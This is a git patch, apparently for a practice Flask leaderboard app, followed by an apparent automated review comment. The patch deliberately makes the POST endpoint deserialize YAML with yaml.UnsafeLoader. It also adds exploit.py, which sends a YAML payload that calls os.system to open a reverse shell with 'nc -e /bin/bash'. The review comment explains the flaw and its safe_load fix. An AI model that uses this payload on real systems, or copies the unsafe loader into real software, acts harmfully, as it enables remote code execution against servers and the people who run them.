From adcb48800c2104476d245d578a820ba1daf04347 Mon Sep 17 00:00:00 2001
From: furtest
Date: Fri, 5 Dec 2025 04:51:03 +0100
Subject: [PATCH] Working exploit and vuln

---
 exploit.py | 11 +++++++++++
 flask_base/app.py | 14 ++++++++++++--
 2 files changed, 23 insertions(+), 2 deletions(-)
 create mode 100644 exploit.py

diff --git a/exploit.py b/exploit.py
new file mode 100644
index 0000000..be244c8
--- /dev/null
+++ b/exploit.py
@@ -0,0 +1,11 @@
+import requests
+
+malicious_yaml = """
+!!python/object/apply:os.system ["nc -e /bin/bash 127.0.0.1 1111"]
+"""
+url = "http://127.0.0.1:8080/api/leaderboard"
+headers = {
+    "Content-Type": "text/yaml"
+}
+response = requests.post(url, headers=headers, data=malicious_yaml)
+print(response.text)
diff --git a/flask_base/app.py b/flask_base/app.py
index ed0543d..5651b8a 100644
--- a/flask_base/app.py
+++ b/flask_base/app.py
@@ -13,17 +13,27 @@ if not os.path.exists(LEADERBOARD_FILE):
 
 def read_leaderboard():
     with open(LEADERBOARD_FILE, 'r') as f:
-        return yaml.load(f, Loader=yaml.UnsafeLoader) or []
+        return yaml.safe_load(f) or []
 
 def write_leaderboard(data):
+    print(data)
     with open(LEADERBOARD_FILE, 'w') as f:
         yaml.safe_dump(data, f)
 
 @app.route('/api/leaderboard', methods=['POST'])
 def add_to_leaderboard():
-    new_entry = request.json
+    if request.content_type == 'text/yaml' or request.content_type == 'application/yaml':
+        try:
+            new_entry = yaml.load(request.data, Loader=yaml.UnsafeLoader)
+        except yaml.YAMLError:
+            return jsonify({'error': 'Invalid YAML format'}), 400
+    else:
+        new_entry = request.json
+
+    print(new_entry)
     if not new_entry or 'name' not in new_entry or 'score' not in new_entry:
         return jsonify({'error': 'Name and score are required'}), 400
+
     leaderboard = read_leaderboard()
     leaderboard.append(new_entry)
     write_leaderboard(leaderboard)
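Review bot: `yaml.load(request.data, Loader=yaml.UnsafeLoader)` in add_to_leaderboard hands an unauthenticated POST body to the full-power loader, so any client can make the server construct arbitrary Python objects — the same loader this hunk removes from read_leaderboard a few lines earlier, and the sink that exploit.py in this patch drives. The commit title says the hole is deliberate; if so, a comment such as `# INTENTIONALLY VULNERABLE: unsafe deserialization of untrusted input (training target)` on that line keeps the next maintainer from mistaking it for production code, and the hardened form is `new_entry = yaml.safe_load(request.data)`. Independently of the loader, the validation on the following context line assumes a mapping: a YAML scalar like a bare string passes `'name' not in new_entry` as a substring test and is appended to the leaderboard, so guard with `if not isinstance(new_entry, dict) or 'name' not in new_entry or 'score' not in new_entry:`. The two added `print(...)` calls also write every raw request body and the entire leaderboard to stdout; route them through `app.logger.debug` or drop them. add_to_leaderboard continues past the end of the hunk.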